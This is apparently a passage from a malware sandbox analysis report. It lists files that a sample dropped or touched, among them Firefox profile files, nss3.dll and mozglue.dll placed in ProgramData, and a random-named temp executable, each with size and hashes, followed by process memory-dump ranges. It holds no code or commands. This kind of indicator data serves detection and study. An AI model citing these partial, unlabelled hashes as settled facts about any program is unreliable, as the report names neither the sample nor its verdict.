                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json

                      Filesize

                      372B

                      MD5

                      6981f969f95b2a983547050ab1cb2a20

                      SHA1

                      e81c6606465b5aefcbef6637e205e9af51312ef5

                      SHA256

                      13b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665

                      SHA512

                      9415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll

                      Filesize

                      10.2MB

                      MD5

                      54dc5ae0659fabc263d83487ae1c03e4

                      SHA1

                      c572526830da6a5a6478f54bc6edb178a4d641f4

                      SHA256

                      43cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e

                      SHA512

                      8e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib

                      Filesize

                      1KB

                      MD5

                      688bed3676d2104e7f17ae1cd2c59404

                      SHA1

                      952b2cdf783ac72fcb98338723e9afd38d47ad8e

                      SHA256

                      33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                      SHA512

                      7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig

                      Filesize

                      1KB

                      MD5

                      dea1586a0ebca332d265dc5eda3c1c19

                      SHA1

                      29e8a8962a3e934fd6a804f9f386173f1b2f9be4

                      SHA256

                      98fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60

                      SHA512

                      0e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

                      Filesize

                      7KB

                      MD5

                      4bd09cd8f1632bd1300a01346cf8ab91

                      SHA1

                      1293a12707570034d67f340025026fa496109bcd

                      SHA256

                      9ce6163c1c2c24ed55167f10c63cea7a73b75dc3d9f9db0fc8af7cbf2421abca

                      SHA512

                      0087170e9874e4968e0f3d66f7adac2f55d7f4281ea7460c00883769b3c5b38f287209171396e9fc54df88b60837dab8d3078f7d91f95b4e1a5be6d499466809

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

                      Filesize

                      6KB

                      MD5

                      0635f961a5f2648162d4a20e7b8720d8

                      SHA1

                      5e51e462b10a3adedba2cdd2e9c62093dfd4e208

                      SHA256

                      b5ba0b97527009fa1663af0907a36248523762ee63074625389c0bc4ab3b3b53

                      SHA512

                      cd9d2ff53bed2d9e7960880de9ce1bb7aa861feb79d697cdcec55e73e5fe3d680b8c18cfc4b8580dad41090e0cf8491648fcffbee0f30d686a404d6af21054c7

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

                      Filesize

                      6KB

                      MD5

                      fff5ebd9db2fd48f1399bd1fe5752542

                      SHA1

                      bf4a25fda5346e755e308a2d2c168936d8ee1952

                      SHA256

                      50fcedb7df08784793c16da042e8fd58f3c0f4a4f03bf0f96d4c428ef9b90837

                      SHA512

                      abd53a92e82e3f06854aaa8f657bd7efd363277e007899486e1d2251bc565fd338a993db8a0a9c622200f9281b69b729dffd410c032287e43449718e752c3c0d

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js

                      Filesize

                      6KB

                      MD5

                      38ef9dba6d2a6434be985d016a96cd12

                      SHA1

                      d695d0bdd87340a1173a80d4f428fd32e1d26170

                      SHA256

                      17fbe84702319f91bff4590b0a8b669eca8cb3e15ada99867235cdcf6e12ab4f

                      SHA512

                      df73a5511caa8f5ac7ed03da823bc61242f3e4e10c9a7e57408049f7e7fa307c4b8a3de25a4ad355aab0827fa9bde5bba5d2da3e60ee5144fb849418bf86f8de

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4

                      Filesize

                      4KB

                      MD5

                      205038494c9e00f687717d6571b50035

                      SHA1

                      b742932464af27d6647500dd1c40c0608debf592

                      SHA256

                      ca00a16a41fe96a88887ae00635b7835c1b7b773c0470705ce894dcf45a033c7

                      SHA512

                      064f705ed7eaea20efdb31e308fb50b0b34aee2b339aed24412521b05773c3c315f83f72a3ce6ee6b9b9dd72ab050f3d9008a6b65ec4d528079945a16cb69e78

                    • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe

                      Filesize

                      446KB

                      MD5

                      4d20b83562eec3660e45027ad56fb444

                      SHA1

                      ff6134c34500a8f8e5881e6a34263e5796f83667

                      SHA256

                      c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

                      SHA512

                      718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

                    • \ProgramData\mozglue.dll

                      Filesize

                      133KB

                      MD5

                      8f73c08a9660691143661bf7332c3c27

                      SHA1

                      37fa65dd737c50fda710fdbde89e51374d0c204a

                      SHA256

                      3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                      SHA512

                      0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                    • \ProgramData\nss3.dll

                      Filesize

                      1.2MB

                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \Users\Admin\AppData\Local\Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE

                      Filesize

                      2.0MB

                      MD5

                      58ec756cc894ece2466d75fc96e9a882

                      SHA1

                      45324c1d496d1a36e09217a4240496f900f69650

                      SHA256

                      045179f6e9b62e320a24a15d7193300ce4bdb060d839678deebadc1e1b0f94ba

                      SHA512

                      0c34dcbe50af59924e7088daafb32df11926e458ef58be082193f95ede3762b0d54beaaf16b04d03d35a9cac1a98debd6b6c4e2ef5aff64917d89efbc85ae4f0

                    • \Users\Admin\AppData\Local\Temp\_MEI16002\api-ms-win-core-file-l2-1-0.dll

                      Filesize

                      11KB

                      MD5

                      721b60b85094851c06d572f0bd5d88cd

                      SHA1

                      4d0ee4d717aeb9c35da8621a545d3e2b9f19b4e7

                      SHA256

                      dac867476caa42ff8df8f5dfe869ffd56a18dadee17d47889afb69ed6519afbf

                      SHA512

                      430a91fcecde4c8cc4ac7eb9b4c6619243ab244ee88c34c9e93ca918e54bd42b08aca8ea4475d4c0f5fa95241e4aacb3206cbae863e92d15528c8e7c9f45601b

                    • \Users\Admin\AppData\Local\Temp\_MEI16002\api-ms-win-core-localization-l1-2-0.dll

                      Filesize

                      14KB

                      MD5

                      1ed0b196ab58edb58fcf84e1739c63ce

                      SHA1

                      ac7d6c77629bdee1df7e380cc9559e09d51d75b7

                      SHA256

                      8664222823e122fca724620fd8b72187fc5336c737d891d3cef85f4f533b8de2

                      SHA512

                      e1fa7f14f39c97aaa3104f3e13098626b5f7cfd665ba52dcb2312a329639aaf5083a9177e4686d11c4213e28acc40e2c027988074b6cc13c5016d5c5e9ef897b

                    • \Users\Admin\AppData\Local\Temp\_MEI16002\api-ms-win-core-processthreads-l1-1-1.dll

                      Filesize

                      11KB

                      MD5

                      7e8b61d27a9d04e28d4dae0bfa0902ed

                      SHA1

                      861a7b31022915f26fb49c79ac357c65782c9f4b

                      SHA256

                      1ef06c600c451e66e744b2ca356b7f4b7b88ba2f52ec7795858d21525848ac8c

                      SHA512

                      1c5b35026937b45beb76cb8d79334a306342c57a8e36cc15d633458582fc8f7d9ab70ace7a92144288c6c017f33ecfc20477a04432619b40a21c9cda8d249f6d

                    • \Users\Admin\AppData\Local\Temp\_MEI16002\api-ms-win-core-timezone-l1-1-0.dll

                      Filesize

                      11KB

                      MD5

                      91a2ae3c4eb79cf748e15a58108409ad

                      SHA1

                      d402b9df99723ea26a141bfc640d78eaf0b0111b

                      SHA256

                      b0eda99eabd32fefecc478fd9fe7439a3f646a864fdab4ec3c1f18574b5f8b34

                      SHA512

                      8527af610c1e2101b6f336a142b1a85ac9c19bb3af4ad4a245cfb6fd602dc185da0f7803358067099475102f3a8f10a834dc75b56d3e6ded2ed833c00ad217ed

                    • memory/620-622-0x0000000000EE0000-0x0000000001387000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/620-572-0x0000000000EE0000-0x0000000001387000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/1004-441-0x0000000000190000-0x000000000062E000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1004-542-0x0000000000190000-0x000000000062E000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1028-63-0x0000000000400000-0x000000000043D000-memory.dmp

                      Filesize

                      244KB

                    • memory/1028-431-0x0000000000400000-0x000000000043D000-memory.dmp

                      Filesize

                      244KB

                    • memory/1028-362-0x0000000060900000-0x0000000060992000-memory.dmp

                      Filesize

                      584KB

                    • memory/1052-647-0x0000000001340000-0x00000000017E3000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1052-71-0x0000000001340000-0x00000000017E3000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1052-95-0x0000000001340000-0x00000000017E3000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1052-589-0x0000000001340000-0x00000000017E3000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1052-43-0x0000000001340000-0x00000000017E3000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1052-225-0x0000000001340000-0x00000000017E3000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1052-65-0x00000000002C0000-0x00000000002C5000-memory.dmp

                      Filesize

                      20KB

                    • memory/1052-66-0x00000000002C0000-0x00000000002C5000-memory.dmp

                      Filesize

                      20KB

                    • memory/1188-433-0x0000000000DE0000-0x0000000000E58000-memory.dmp

                      Filesize

                      480KB

                    • memory/1680-183-0x0000000006560000-0x00000000069FE000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1916-574-0x0000000000B80000-0x000000000101B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1916-708-0x0000000000B80000-0x000000000101B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1916-411-0x0000000000B80000-0x000000000101B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1916-598-0x0000000000B80000-0x000000000101B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/1916-799-0x0000000000B00000-0x0000000000B05000-memory.dmp

                      Filesize

                      20KB

                    • memory/1964-361-0x000007FEF6060000-0x000007FEF6649000-memory.dmp

                      Filesize

                      5.9MB

                    • memory/2008-625-0x0000000000280000-0x000000000071E000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2200-624-0x0000000000C70000-0x00000000012EB000-memory.dmp

                      Filesize

                      6.5MB

                    • memory/2200-617-0x0000000000C70000-0x00000000012EB000-memory.dmp

                      Filesize

                      6.5MB

                    • memory/2408-437-0x00000000065D0000-0x0000000006A6E000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2520-3-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2520-14-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2520-0-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2520-16-0x0000000007010000-0x00000000074D9000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2520-15-0x0000000001371000-0x00000000013DD000-memory.dmp

                      Filesize

                      432KB

                    • memory/2520-1-0x0000000077C40000-0x0000000077C42000-memory.dmp

                      Filesize

                      8KB

                    • memory/2520-2-0x0000000001371000-0x00000000013DD000-memory.dmp

                      Filesize

                      432KB

                    • memory/2520-5-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2768-695-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2768-699-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2768-697-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2768-707-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2768-706-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2768-705-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/2768-703-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2768-701-0x0000000000400000-0x0000000000463000-memory.dmp

                      Filesize

                      396KB

                    • memory/2788-576-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2788-578-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2788-588-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2788-587-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2788-586-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/2788-584-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2788-582-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2788-580-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/2828-201-0x0000000000C00000-0x000000000109E000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2828-184-0x0000000000C00000-0x000000000109E000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2996-20-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-42-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-590-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-570-0x0000000006DB0000-0x0000000007257000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2996-70-0x0000000006DB0000-0x0000000007253000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2996-410-0x0000000006DB0000-0x000000000724B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2996-96-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-64-0x0000000006DB0000-0x0000000007253000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2996-60-0x00000000031C0000-0x00000000031FD000-memory.dmp

                      Filesize

                      244KB

                    • memory/2996-61-0x00000000031C0000-0x00000000031FD000-memory.dmp

                      Filesize

                      244KB

                    • memory/2996-1060-0x00000000031C0000-0x00000000031FD000-memory.dmp

                      Filesize

                      244KB

                    • memory/2996-615-0x0000000006DB0000-0x000000000742B000-memory.dmp

                      Filesize

                      6.5MB

                    • memory/2996-1068-0x00000000031C0000-0x00000000031FD000-memory.dmp

                      Filesize

                      244KB

                    • memory/2996-45-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-616-0x0000000006DB0000-0x000000000742B000-memory.dmp

                      Filesize

                      6.5MB

                    • memory/2996-353-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-38-0x0000000006DB0000-0x0000000007253000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2996-39-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-40-0x0000000006DB0000-0x0000000007253000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2996-23-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-21-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-682-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-19-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-18-0x0000000001370000-0x0000000001839000-memory.dmp

                      Filesize

                      4.8MB

                    • memory/2996-626-0x0000000006DB0000-0x0000000007257000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2996-709-0x0000000006DB0000-0x000000000742B000-memory.dmp

                      Filesize

                      6.5MB

                    • memory/2996-627-0x0000000006DB0000-0x0000000007257000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2996-571-0x0000000006DB0000-0x0000000007257000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2996-573-0x0000000006DB0000-0x000000000724B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3836-850-0x00000000008F0000-0x0000000000D54000-memory.dmp

                      Filesize

                      4.4MB

                    • memory/3836-849-0x00000000008F0000-0x0000000000D54000-memory.dmp

                      Filesize

                      4.4MB